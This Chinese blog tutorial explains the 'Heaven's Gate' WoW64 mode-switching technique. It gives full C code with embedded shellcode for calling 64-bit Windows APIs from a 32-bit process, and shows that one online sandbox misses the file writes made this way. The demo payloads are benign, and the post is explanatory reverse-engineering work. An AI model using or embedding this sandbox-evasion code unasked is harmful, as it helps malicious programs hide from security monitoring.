天堂之门 (Heaven's Gate) C语言实现

天堂之门 (Heaven’s Gate) 是一种在32位WoW64进程中执行64位代码,以及直接调用64位WIN32 API函数的技术。从安全角度看,天堂之门可以作为一种软件保护技术,用于防止静态分析以及跨进程的API Hook;从恶意代码角度看,该技术可以绕过沙盒对WIN32 API调用的检测。本文介绍了天堂之门技术的原理及C语言实现。

目录

[TOC]

0x00. 原理分析

天堂之门技术的最早应用已经不可考究,我找到的最早的一篇详解天堂之门的文章是2012年的Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching,内容非常详细,目前能找到的有关天堂之门的文章大多都引用了这篇。比较新的一个是Rebuild The Heaven’s Gate: from 32-bit Hell back to 64-bit Wonderland,貌似是一个台湾人(《惡意程式前線戰術指南》作者馬聖豪)的讲座PPT,比较简短。

什么是WoW64?

简单来说WoW64是Windows x64提供的一种兼容机制,可以认为WoW64是64位Windows系统创建的一个32位的模拟环境,使得32位可执行程序能够在64位的操作系统上正常运行。

推荐一篇讲解WoW64的深度好文WoW64 internals,这里就不再赘述了。

32位进程的API调用过程(WoW64)

下图(来自Rebuild The Heaven’s Gate: from 32-bit Hell back to 64-bit Wonderland)展示了正常情况下32位进程通过WoW64机制调用WIN32 API的过程。以ZwOpenProcess函数的调用为例:

  1. a.exe首先调用32位ntdll.dll(以下简称ntdll32)中的ZwOpenProcess函数
  2. ntdll32调用wow64cpu.dll中的X86SwitchTo64BitMode,顾名思义,调用该函数后进程从32位模式切换到64位模式
  3. wow64.dll将32位的系统调用转化为64位
  4. 调用64位ntdll.dllZwOpenProcess函数
  5. 切换到内核态(Ring0)执行系统调用

image-20211106105559585

32位进程的API调用过程(天堂之门)

下图展示了通过天堂之门技术调用WIN32 API的过程。这里我们通过一些操作绕过了WoW64机制,手动切换到64位模式并调用64位下的ZwOpenProcess函数,大致流程如下(和图中不太一样):

  1. 将cs段寄存器设为0x33,切换到64位模式
  2. 从gs:0x60读取64位PEB
  3. 从64位PEB中定位64位ntdll基址
  4. 遍历ntdll64导出表,读取ZwOpenProcess函数地址
  5. 构造64位函数调用

如果需要调用的是ntdll之外的函数,以kernel32.dll中的CreateFile函数为例,还需要:

  1. 遍历ntdll64导出表,读取LdrLoadDll函数地址
  2. 调用LdrLoadDll("kernel32.dll")加载64位kernel32.dll
  3. 从64位的kernel32中读取GetProcAddress等函数,获取CreateFile函数地址
  4. 调用CreateFile函数

image-20211106111544450

从上述过程中我们可以发现通过天堂之门的API调用并没有调用ntdll32中的函数,而目前大多数沙箱在检测32位程序时仅仅会对32位函数进行Hook,通过天堂之门,我们成功绕过了沙箱的API检测:

image-20211106114019275

0x01. 代码实现

GitHub仓库:bluesadi/Heavens-Gate

实现天堂之门大概需要实现到以下几个函数:

  1. memcpy64:在64位地址之间拷贝数据

  2. GetPEB64:获取64位的PEB地址

  3. GetModuleHandle64:获取64位的模块基址

  4. GetProcAddress64:获取64位模块中的函数地址

  5. X64Call:调用64位函数

  6. MakeUTFStr:构造UNICODE_STRING结构体

  7. GetKernel32:加载64位kernel32.dll及其依赖kernelbase.dll

  8. LoadLibrary64:在加载kernel32.dll后用于加载user32.dll

接下来我们将一一讲解这些函数的实现。

环境准备

  • Visual Studio 2019
  • WinDbg(x64)
  • Windows 10 x64 20H2

VS项目属性中选择"Release", “Win32”,切记关闭优化(不关优化会出现玄学错误!!!):

image-20211106104714162

C/C+±>代码生成->运行库改为“多线程(/MT)”,即静态编译:

image-20211106132721846

memcpy64

函数声明:

1
void memcpy64(uint64_t dst, uint64_t src, uint64_t sz);

该函数的作用是将64位地址src的内容拷贝到dst,拷贝sz个字节,因为我们操作的地址是64位的,所以我们必须切换到64位模式用64位的汇编实现

由32位切换到64位的代码如下,[bits 32]表示接下来的汇编要以32位模式编译,_next_x64_code为64位汇编代码的地址:

1
2
3
4
[bits 32]
push 0x33
push _next_x64_code
retf

retf表示远返回,该指令会从栈顶取出一个返回地址,再取出一个cs段选择子,在上述代码中,retf指令会跳转到0x33:_next_x64_code,并将cs段寄存器置为0x33,此时程序切换到64位模式(Windows下cs段寄存器为0x23则以32位模式执行指令,为0x33则以64位模式执行指令)。

随后执行64位汇编指令,将src的数据拷贝到dst中,这里不再做解释:

1
2
3
4
5
6
7
8
9
[bits 64]
push rsi
push rdi
mov rsi, src
mov rdi, dst
mov rcx, sz
rep movsb
pop rsi
pop rdi

执行完64位代码后,我们需要切回32位模式并返回。retfq中的q表示qword,即返回到64位的地址:

1
2
3
4
5
6
[bits 64]
push 0x23
push _next_x86_code
retfq
[bits 32]
ret

汇编的编译我们可以用Python的keystone模块实现:

1
2
3
4
5
6
7
8
9
10
11
12
13
from keystone import *

code = '''
push 0x33
push 0x12345678
retf
'''

ks = Ks(KS_ARCH_X86, KS_MODE_32)
asm, cnt = ks.asm(code)
print(code)
for b in asm:
print('0x' + hex(b)[2:].upper(), end=', ')

输出得到shellcode,其中0x12345678我们要替换成_next_x64_code,也就是下一段64位汇编指令的地址:

1
2
3
4
5
push 0x33      
push 0x12345678
retf

0x6A, 0x33, 0x68, 0x78, 0x56, 0x34, 0x12, 0xCB,

完整的shellcode:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
static uint8_t code[] = {
/* [bits 32]
push 0x33
push _next_x64_code
retf
*/
0x6A, 0x33, 0x68, 0x78, 0x56, 0x34, 0x12, 0xCB,
/* [bits 64]
push rsi
push rdi
mov rsi, src
mov rdi, dst
mov rcx, sz
rep movsb
pop rsi
pop rdi
*/
0x56, 0x57,
0x48, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,
0x48, 0xBF, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,
0x48, 0xB9, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,
0xF3, 0xA4,
0x5E, 0x5F,
/* [bits 64]
push 0x23
push _next_x86_code
retfq
*/
0x6A, 0x23, 0x68, 0x78, 0x56, 0x34, 0x12, 0x48, 0xCB,
/* [bits 32]
ret
*/
0xC3
};

要执行这段shellcode,我们需要在堆中开辟新的空间,属性为PAGE_EXECUTE_READWRITE,即可读可写可执行,将shellcode拷贝到这块区域,替换_next_x64_codesrcdst_next_x86_code的地址后执行:

1
2
3
4
5
6
7
8
9
10
11
static uint32_t ptr = NULL;
if (!ptr) {
ptr = (uint32_t)VirtualAlloc(NULL, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
for (int i = 0; i < sizeof(code); i++) ((PBYTE)ptr)[i] = code[i];
}
*(uint32_t*)(ptr + 3) = ptr + 8;
*(uint64_t*)(ptr + 12) = src;
*(uint64_t*)(ptr + 22) = dst;
*(uint64_t*)(ptr + 32) = sz;
*(uint32_t*)(ptr + 47) = ptr + 53;
((void(*)())ptr)();

完整代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
void memcpy64(uint64_t dst, uint64_t src, uint64_t sz) {
static uint8_t code[] = {
/* [bits 32]
push 0x33
push _next_x64_code
retf
*/
0x6A, 0x33, 0x68, 0x78, 0x56, 0x34, 0x12, 0xCB,
/* [bits 64]
push rsi
push rdi
mov rsi, src
mov rdi, dst
mov rcx, sz
rep movsb
pop rsi
pop rdi
*/
0x56, 0x57,
0x48, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,
0x48, 0xBF, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,
0x48, 0xB9, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,
0xF3, 0xA4,
0x5E, 0x5F,
/* [bits 64]
push 0x23
push _next_x86_code
retfq
*/
0x6A, 0x23, 0x68, 0x78, 0x56, 0x34, 0x12, 0x48, 0xCB,
/* [bits 32]
ret
*/
0xC3
};

static uint32_t ptr = NULL;
if (!ptr) {
ptr = (uint32_t)VirtualAlloc(NULL, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
for (int i = 0; i < sizeof(code); i++) ((PBYTE)ptr)[i] = code[i];
}
*(uint32_t*)(ptr + 3) = ptr + 8;
*(uint64_t*)(ptr + 12) = src;
*(uint64_t*)(ptr + 22) = dst;
*(uint64_t*)(ptr + 32) = sz;
*(uint32_t*)(ptr + 47) = ptr + 53;
((void(*)())ptr)();
}

GetPEB64

函数声明:

1
void GetPEB64(void* peb64);

该函数的作用是获取PEB64的地址。

64位中gs:[0x30]指向TEB,gs:[0x60]指向PEB,获取PEB64的地址很简单,只需要将gs:[0x60]拷贝到rax作为返回值即可:

1
2
3
[bits 64]
mov rax, gs:[0x60]
mov [esi], rax

完整代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
void GetPEB64(void *peb64) {
static uint8_t code[] = {
/* [bits 32]
mov esi, peb64
push 0x33
push _next_x64_code
retf
*/
0xBE, 0x78, 0x56, 0x34, 0x12, 0x6A, 0x33, 0x68, 0x78, 0x56, 0x34, 0x12, 0xCB,
/* [bits 64]
mov rax, gs:[0x60]
mov [esi], rax
*/
0x65, 0x48, 0xA1, 0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x67, 0x48, 0x89, 0x6,
/* [bits 64]
push 0x23
push _next_x86_code
retfq
*/
0x6A, 0x23, 0x68, 0x78, 0x56, 0x34, 0x12, 0x48, 0xCB,
/* [bits 32]
ret
*/
0xC3
};

static uint32_t ptr = NULL;
if (!ptr) {
ptr = (uint32_t)VirtualAlloc(NULL, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
for (int i = 0; i < sizeof(code); i++) ((PBYTE)ptr)[i] = code[i];
}
*(uint32_t*)(ptr + 1) = (uint32_t)peb64;
*(uint32_t*)(ptr + 8) = ptr + 13;
*(uint32_t*)(ptr + 31) = ptr + 37;
((void(*)())ptr)();
}

GetModuleHandle64

函数声明:

1
uint64_t GetModuleHandle64(const WCHAR *moduleName);

该函数的作用是获取名为moduleName的模块的基址。

实现步骤如下:

  1. PEB+0x18获取Ldr的地址
  2. Ldr+0x10获取InLoadOrderModuleList地址
  3. 遍历InLoadOrderModuleList获取模块基址
  4. 通过模块基址获取模块名,并与moduleName比对,比对成功则返回该模块基址

img

在WinDbg中使用dt指令查看结构体,可以看到Ldr的地址在PEB中的偏移为0x018:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
0:000> dt _PEB
ntdll!_PEB
+0x000 InheritedAddressSpace : UChar
+0x001 ReadImageFileExecOptions : UChar
+0x002 BeingDebugged : UChar
+0x003 BitField : UChar
+0x003 ImageUsesLargePages : Pos 0, 1 Bit
+0x003 IsProtectedProcess : Pos 1, 1 Bit
+0x003 IsImageDynamicallyRelocated : Pos 2, 1 Bit
+0x003 SkipPatchingUser32Forwarders : Pos 3, 1 Bit
+0x003 IsPackagedProcess : Pos 4, 1 Bit
+0x003 IsAppContainer : Pos 5, 1 Bit
+0x003 IsProtectedProcessLight : Pos 6, 1 Bit
+0x003 IsLongPathAwareProcess : Pos 7, 1 Bit
+0x004 Padding0 : [4] UChar
+0x008 Mutant : Ptr64 Void
+0x010 ImageBaseAddress : Ptr64 Void
+0x018 Ldr : Ptr64 _PEB_LDR_DATA

用之前实现的memcpy64函数拷贝Ldr的地址:

1
2
3
4
5
uint64_t peb64;
uint64_t ldrData;

GetPEB64(&peb64);
memcpy64((uint64_t)&ldrData, peb64 + 0x18, 8);

打印_PEB_LDR_DATA结构体,可以看到InLoadOrderModuleList在Ldr中的偏移为0x10:

1
2
3
4
5
6
7
8
9
10
11
0:000> dt _PEB_LDR_DATA
ntdll!_PEB_LDR_DATA
+0x000 Length : Uint4B
+0x004 Initialized : UChar
+0x008 SsHandle : Ptr64 Void
+0x010 InLoadOrderModuleList : _LIST_ENTRY
+0x020 InMemoryOrderModuleList : _LIST_ENTRY
+0x030 InInitializationOrderModuleList : _LIST_ENTRY
+0x040 EntryInProgress : Ptr64 Void
+0x048 ShutdownInProgress : UChar
+0x050 ShutdownThreadId : Ptr64 Void

拷贝InLoadOrderModuleList的地址:

1
2
3
4
5
uint64_t head;
uint64_t pNode;

head = ldrData + 0x10;
memcpy64((uint64_t)&pNode, head, 8);

InLoadOrderModuleList的实际类型为_LDR_DATA_TABLE_ENTRYBaseDllName中存储了DLL的名称,类型为_UNICODE_STRING

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0:000> dt _LDR_DATA_TABLE_ENTRY
ntdll!_LDR_DATA_TABLE_ENTRY
+0x000 InLoadOrderLinks : _LIST_ENTRY
+0x010 InMemoryOrderLinks : _LIST_ENTRY
+0x020 InInitializationOrderLinks : _LIST_ENTRY
+0x030 DllBase : Ptr64 Void
+0x038 EntryPoint : Ptr64 Void
+0x040 SizeOfImage : Uint4B
+0x048 FullDllName : _UNICODE_STRING
+0x058 BaseDllName : _UNICODE_STRING

0:000> dt _UNICODE_STRING
ntdll!_UNICODE_STRING
+0x000 Length : Uint2B
+0x002 MaximumLength : Uint2B
+0x008 Buffer : Ptr64 Wchar

所以Buffer的偏移量在_LDR_DATA_TABLE_ENTRY中的偏移为0x58+0x08,即96。

遍历链表的代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
while (pNode != head) {
uint64_t buffer;
memcpy64((uint64_t)(unsigned)(&buffer), pNode + 96, 8); // tmp = pNode->BaseDllName->Buffer
if (buffer) {
WCHAR curModuleName[32] = {0};
memcpy64((uint64_t)curModuleName, buffer, 60);
if (!lstrcmpiW(moduleName, curModuleName)) {
uint64_t base;
memcpy64((uint64_t)&base, pNode + 48, 8);
return base;
}
}
memcpy64((uint64_t)&pNode, pNode, 8); // pNode = pNode->Flink
}

完整代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
uint64_t GetModuleHandle64(const WCHAR *moduleName) {
uint64_t peb64;
/* nt!_PEB_LDR_DATA
+0x000 Length : Uint4B
+0x004 Initialized : UChar
+0x008 SsHandle : Ptr64 Void
+0x010 InLoadOrderModuleList : _LIST_ENTRY
*/
uint64_t ldrData;
/*
ptr to InLoadOrderModuleList
*/
uint64_t head;
/*
typedef struct _LDR_MODULE {
+0x000 LIST_ENTRY InLoadOrderModuleList;
+0x010 LIST_ENTRY InMemoryOrderModuleList;
+0x020 LIST_ENTRY InInitializationOrderModuleList;
+0x030 PVOID BaseAddress;
+0x038 PVOID EntryPoint;
+0x040 ULONG SizeOfImage;
+0x048 UNICODE_STRING FullDllName;
+0x058 UNICODE_STRING BaseDllName;
...
} LDR_MODULE, *PLDR_MODULE;
*/
uint64_t pNode;
GetPEB64(&peb64);
memcpy64((uint64_t)&ldrData, peb64 + 0x18, 8);
head = ldrData + 0x10;
memcpy64((uint64_t)&pNode, head, 8);
while (pNode != head) {
uint64_t buffer;
memcpy64((uint64_t)(unsigned)(&buffer), pNode + 96, 8); // tmp = pNode->BaseDllName->Buffer
if (buffer) {
WCHAR curModuleName[32] = {0};
memcpy64((uint64_t)curModuleName, buffer, 60);
if (!lstrcmpiW(moduleName, curModuleName)) {
uint64_t base;
memcpy64((uint64_t)&base, pNode + 48, 8);
return base;
}
}
memcpy64((uint64_t)&pNode, pNode, 8); // pNode = pNode->Flink
}
return NULL;
}

MyGetProcAddress

函数声明:

1
uint64_t MyGetProcAddress64(uint64_t hModule, const char* func);

通过GetModuleHandle64获取模块地址后,此时还无法通过kernel32.dll中的GetProcAddress函数获取模块中函数的地址,可以通过遍历模块的导出表获取函数地址作为过渡方案。

img

首先获取导出表地址,这部分涉及PE文件结构,不再赘述了:

1
2
3
4
5
6
IMAGE_DOS_HEADER dos;
memcpy64((uint64_t)&dos, hModule, sizeof(dos));
IMAGE_NT_HEADERS64 nt;
memcpy64((uint64_t)&nt, hModule + dos.e_lfanew, sizeof(nt));
IMAGE_EXPORT_DIRECTORY expo;
memcpy64((uint64_t)&expo, hModule + nt.OptionalHeader.DataDirectory[0].VirtualAddress, sizeof(expo));

随后遍历导出表,从导出表中读取函数的名称和地址,将函数名称与func进行比对,比对成功则返回函数地址:

1
2
3
4
5
6
7
8
9
10
11
12
13
for (uint64_t i = 0; i < expo.NumberOfNames; i++) {
DWORD pName;
memcpy64((uint64_t)&pName, hModule + expo.AddressOfNames + (4 * i), 4);
char name[64] = {0};
memcpy64((uint64_t)name, hModule + pName, 64);
if (!lstrcmpA(name, func)) {
WORD ord;
memcpy64((uint64_t)&ord, hModule + expo.AddressOfNameOrdinals + (2 * i), 2);
uint32_t addr;
memcpy64((uint64_t)&addr, hModule + expo.AddressOfFunctions + (4 * ord), 4);
return hModule + addr;
}
}

完整代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
uint64_t MyGetProcAddress(uint64_t hModule, const char* func) {
IMAGE_DOS_HEADER dos;
memcpy64((uint64_t)&dos, hModule, sizeof(dos));
IMAGE_NT_HEADERS64 nt;
memcpy64((uint64_t)&nt, hModule + dos.e_lfanew, sizeof(nt));
IMAGE_EXPORT_DIRECTORY expo;
memcpy64((uint64_t)&expo, hModule + nt.OptionalHeader.DataDirectory[0].VirtualAddress, sizeof(expo));

for (uint64_t i = 0; i < expo.NumberOfNames; i++) {
DWORD pName;
memcpy64((uint64_t)&pName, hModule + expo.AddressOfNames + (4 * i), 4);
char name[64] = {0};
memcpy64((uint64_t)name, hModule + pName, 64);
if (!lstrcmpA(name, func)) {
WORD ord;
memcpy64((uint64_t)&ord, hModule + expo.AddressOfNameOrdinals + (2 * i), 2);
uint32_t addr;
memcpy64((uint64_t)&addr, hModule + expo.AddressOfFunctions + (4 * ord), 4);
return hModule + addr;
}
}
return NULL;
}

X64Call

函数声明:

1
uint64_t X64Call(uint64_t proc, uint32_t argc, ...);

由于32位与64位的函数调用的传参方式不同,以及在上一步中我们通过MyGetProcAddress函数获取的函数地址为64位,肯定不能直接转化为函数指针调用,所以我们需要用64位汇编实现一个64位函数的调用。

首先来简单了解一下64位中WINAPI调用的传参方式:

  • 前四个参数从左往右依次存放到rcx, rdx, r8, r9寄存器中
  • 后面的参数从右往左依次入栈
  • rsp与最后一个参数之间直接需要保留大小为20字节的空间,被调函数可能会使用

image-20211106141230284

构造shellcode,因为接下来我们需要对栈指针进行操作,所以首先将esp保存到ebx中,shellcode执行完毕后需要复原。and esp, 0xFFFFFFF8的作用是使rsp与8对齐,这是64位汇编的栈对齐要求,否则在执行某些系统调用时可能会出错:

1
2
3
4
5
6
7
8
[bits 32]
push ebx
mov ebx, esp
and esp, 0xFFFFFFF8

push 0x33
push _next_x64_code
retf

切换到64位后按照64位WINAPI调用协定传参,调用函数之前保留32字节的空间,将函数返回值保存到rax。在shellcode执行前后保存和复原rsirdi

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
[bits 64]
push rsi
push rdi

mov rsi, args
mov rcx, [rsi]
mov rdx, [rsi+8]
mov r8, [rsi+16]
mov r9, [rsi+24]

mov rax, argc
args_start:
cmp rax, 4
jle args_end
mov rdi, [rsi+8*rax-8]
push rdi
dec rax
jmp args_start
args_end:

mov rax, proc
sub rsp, 32
call rax

mov rdi, &ret
mov [rdi], rax

pop rdi
pop rsi

最后切换回32位模式,并还原espebx

1
2
3
4
5
6
7
8
[bits 64]
push 0x23
push _next_x86_code
retfq
[bits 32]
mov esp, ebx
pop ebx
ret

完整代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
uint64_t X64Call(uint64_t proc, uint32_t argc, ...) {
uint64_t* args = (uint64_t*)(&argc + 1);
uint64_t ret = 0;
static uint8_t code[] = {
/* [bits 32]
push ebx
mov ebx, esp
and esp, 0xFFFFFFF8

push 0x33
push _next_x64_code
retf
*/
0x53, 0x89, 0xE3, 0x83, 0xE4, 0xF8,
0x6A, 0x33, 0x68, 0x78, 0x56, 0x34, 0x12, 0xCB,
/* [bits 64]
push rsi
push rdi

mov rsi, args
mov rcx, [rsi]
mov rdx, [rsi+8]
mov r8, [rsi+16]
mov r9, [rsi+24]

mov rax, argc
args_start:
cmp rax, 4
jle args_end
mov rdi, [rsi+8*rax-8]
push rdi
dec rax
jmp args_start
args_end:

mov rax, proc
sub rsp, 32
call rax

mov rdi, &ret
mov [rdi], rax

pop rdi
pop rsi
*/
0x56, 0x57,
0x48, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x48, 0x8B, 0xE, 0x48, 0x8B, 0x56, 0x8, 0x4C, 0x8B, 0x46, 0x10, 0x4C, 0x8B, 0x4E, 0x18,
0x48, 0xB8, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x48, 0x83, 0xF8, 0x4, 0x7E, 0xB, 0x48, 0x8B, 0x7C, 0xC6, 0xF8, 0x57, 0x48, 0xFF, 0xC8, 0xEB, 0xEF,
0x48, 0xB8, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x48, 0x83, 0xEC, 0x20, 0xFF, 0xD0,
0x48, 0xBF, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x48, 0x89, 0x7,
0x5F, 0x5E,
/* [bits 64]
push 0x23
push _next_x86_code
retfq
*/
0x6A, 0x23, 0x68, 0x78, 0x56, 0x34, 0x12, 0x48, 0xCB,
/* [bits 32]
mov esp, ebx
pop ebx
ret
*/
0x89, 0xDC, 0x5B,
0xC3
};

static uint32_t ptr = NULL;
if (!ptr) {
ptr = (uint32_t)VirtualAlloc(NULL, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
for (int i = 0; i < sizeof(code); i++) ((PBYTE)ptr)[i] = code[i];
}
*(uint32_t*)(ptr + 9) = ptr + 14;
*(uint64_t*)(ptr + 18) = (uint64_t)args;
*(uint64_t*)(ptr + 43) = (uint64_t)argc;
*(uint64_t*)(ptr + 70) = proc;
*(uint64_t*)(ptr + 86) = (uint64_t)&ret;
*(uint32_t*)(ptr + 102) = ptr + 108;
((void(*)())ptr)();
return ret;
}

MakeUTFStr

函数原型如下:

1
char* MakeUTFStr(const char* str);

构造一个_UNICODE_STRING结构体并返回64位的地址。代码实现如下:

1
2
3
4
5
6
7
8
9
10
11
char* MakeUTFStr(const char* str) {
uint32_t len = lstrlenA(str);
char* out = (char*)malloc(16 + (len + 1) * 2);
*(uint16_t*)(out) = (uint16_t)(len * 2); //Length
*(uint16_t*)(out + 2) = (uint16_t)((len + 1) * 2); //Max Length

uint16_t* outstr = (uint16_t*)(out + 16);
for (uint32_t i = 0; i <= len; i++) outstr[i] = str[i];
*(uint64_t*)(out + 8) = (uint64_t)(out + 16);
return out;
}

GetKernel32

函数声明:

1
uint64_t GetKernel32();

加载kernel32.dll以及kernelbase.dll

在上面提到的Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching这篇文章中对这一部分有很复杂的叙述。kernel32.dll在Windows中的加载地址是固定的,并且只能被加载到那个地址。在该作者测试的环境下64位kernel32.dll的加载地址所在的空间已经被分配并且被映射为私有的了,会导致调用LdrLoadDll函数加载kernel32.dll时失败并返回0xC0000018 ( STATUS_CONFLICTING_ADDRESSES )。

Any attempts to load kernel32.dll using the LdrLoadDll function would result to the error code 0xC0000018 ( STATUS_CONFLICTING_ADDRESSES ). This is due to the fact that the default memory location of kernel32 is already mapped as private.

解决的思路非常简单:即调用NtFreeVirtualMemory函数将这块已经分配的空间释放掉,再用LdrLoadDll重新加载。但代码写起来非常复杂,可以参考dadas190/Heavens-Gate-2.0的实现。

但是在我的操作系统上(Windows 10 x64 20H2),并没有找到作者提到的分配和映射过程,并且直接调用LdrLoadDll函数也能正常加载kernel32.dll,可能是在某个Windows版本中被移除了吧。

所以加载kernel64这部分的代码就变得非常简单了:

1
2
3
4
5
6
7
8
9
10
uint64_t GetKernel32() {
static uint64_t kernel32 = 0;
if (kernel32) return kernel32;

uint64_t ntdll = GetModuleHandle64(L"ntdll.dll");
uint64_t LdrLoadDll = MyGetProcAddress(ntdll, "LdrLoadDll");
char* str = MakeUTFStr("kernel32.dll");
X64Call(LdrLoadDll, 4, (uint64_t)0, (uint64_t)0, (uint64_t)str, (uint64_t)(&kernel32));
return kernel32;
}

GetProcAddress64

函数原型:

1
uint64_t GetProcAddress64(uint64_t hModule, const char* func);

获取了kernel64的地址后我们就能直接通过GetProcAddress函数获取模块中函数的地址了。代码实现如下:

1
2
3
4
5
6
uint64_t GetProcAddress64(uint64_t module, const char* func) {
static uint64_t K32GetProcAddress = 0;
if (!K32GetProcAddress)K32GetProcAddress = MyGetProcAddress(GetKernel32(), "GetProcAddress");

return X64Call(K32GetProcAddress, 2, module, (uint64_t)func);
}

LoadLibrary64

函数原型:

1
uint64_t LoadLibrary64(const char* name)

调用kernel64的LoadLibraryA函数加载其他DLL,如user32.dll等等。

代码实现如下:

1
2
3
4
5
6
uint64_t LoadLibrary64(const char* name) {
static uint64_t LoadLibraryA = 0;
if (!LoadLibraryA) LoadLibraryA = GetProcAddress64(GetKernel32(), "LoadLibraryA");

return X64Call(LoadLibraryA, 1, (uint64_t)name);
}

MessageBox测试

测试一下典中典之MessageBox弹窗:

1
2
3
4
5
6
7
8
9
10
void Test() {
uint64_t kernel32 = GetKernel32();
uint64_t user32 = LoadLibrary64("user32.dll");
uint64_t MessageBox64 = GetProcAddress64(user32, "MessageBoxA");
X64Call(MessageBox64, 4, (uint64_t)NULL, (uint64_t)"Wowowowowow", (uint64_t)"Wowowowowow", (uint64_t)NULL);
}

int main() {
Test();
}

运行效果:

image-20211106145257165

0x02. 沙箱&火绒剑测试

微步云沙箱测试

首先测试一段正常的文件读写代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
void TestNormal() {
char path[MAX_PATH];
char hacked[] = "Hacked by 34r7hm4n";
HANDLE hFile;
char buffer[100] = { 0 };
GetCurrentDirectoryA(MAX_PATH, path);
lstrcatA(path, "\\test.txt");
hFile = CreateFileA(path, GENERIC_WRITE, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
CloseHandle(hFile);
hFile = CreateFileA(path, GENERIC_WRITE, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
WriteFile(hFile, hacked, lstrlenA(hacked), NULL, NULL);
CloseHandle(hFile);
hFile = CreateFileA(path, GENERIC_READ, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
ReadFile(hFile, buffer, sizeof(buffer), NULL, NULL);
CloseHandle(hFile);
printf("%s\n", buffer);
system("pause");
}

检测到了文件释放:

image-20211106145521139

再测试一下用天堂之门实现的同样功能的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
void TestHeavensGate() {
uint64_t kernel32 = GetKernel32();
uint64_t user32 = LoadLibrary64("user32.dll");
uint64_t CreateFile64 = GetProcAddress64(kernel32, "CreateFileA");
uint64_t WriteFile64 = GetProcAddress64(kernel32, "WriteFile");
uint64_t ReadFile64 = GetProcAddress64(kernel32, "ReadFile");
uint64_t CloseHandle64 = GetProcAddress64(kernel32, "CloseHandle");
char path[MAX_PATH];
char hacked[] = "Hacked by 34r7hm4n";
uint64_t hFile;
char buffer[100] = { 0 };

GetCurrentDirectoryA(MAX_PATH, path);
lstrcatA(path, "\\test.txt");
hFile = X64Call(CreateFile64, 7, (uint64_t)path, (uint64_t)GENERIC_WRITE, (uint64_t)NULL, (uint64_t)NULL, (uint64_t)CREATE_NEW, (uint64_t)FILE_ATTRIBUTE_NORMAL, (uint64_t)NULL);
X64Call(CloseHandle64, 1, hFile);
hFile = X64Call(CreateFile64, 7, (uint64_t)path, (uint64_t)GENERIC_WRITE, (uint64_t)NULL, (uint64_t)NULL, (uint64_t)OPEN_EXISTING, (uint64_t)FILE_ATTRIBUTE_NORMAL, (uint64_t)NULL);
X64Call(WriteFile64, 5, (uint64_t)hFile, (uint64_t)hacked, (uint64_t)lstrlenA(hacked), (uint64_t)NULL, (uint64_t)NULL);
X64Call(CloseHandle64, 1, hFile);
hFile = X64Call(CreateFile64, 7, (uint64_t)path, (uint64_t)GENERIC_READ, (uint64_t)NULL, (uint64_t)NULL, (uint64_t)OPEN_EXISTING, (uint64_t)FILE_ATTRIBUTE_NORMAL, (uint64_t)NULL);
X64Call(ReadFile64, 5, (uint64_t)hFile, (uint64_t)buffer, (uint64_t)sizeof(buffer), (uint64_t)NULL, (uint64_t)NULL);
X64Call(CloseHandle64, 1, hFile);
printf("%s\n", buffer);
system("pause");
}

没有检测到文件释放:

image-20211106145630433

魔盾测试

直接崩了,无语:

image-20211106150139913

火绒剑测试

最终没能逃出火绒剑的魔爪:

image-20211106150000934

0x03. 玄学Bug

目前还有一些玄学Bug,原因不明:

  1. 只能生成后双击运行。在VS中运行或在cmd中运行会导致无法加载kernel32.dllLdrLoadDll("kernel32.dll")返回0xC0000142 (STATUS_DLL_INIT_FAILED)
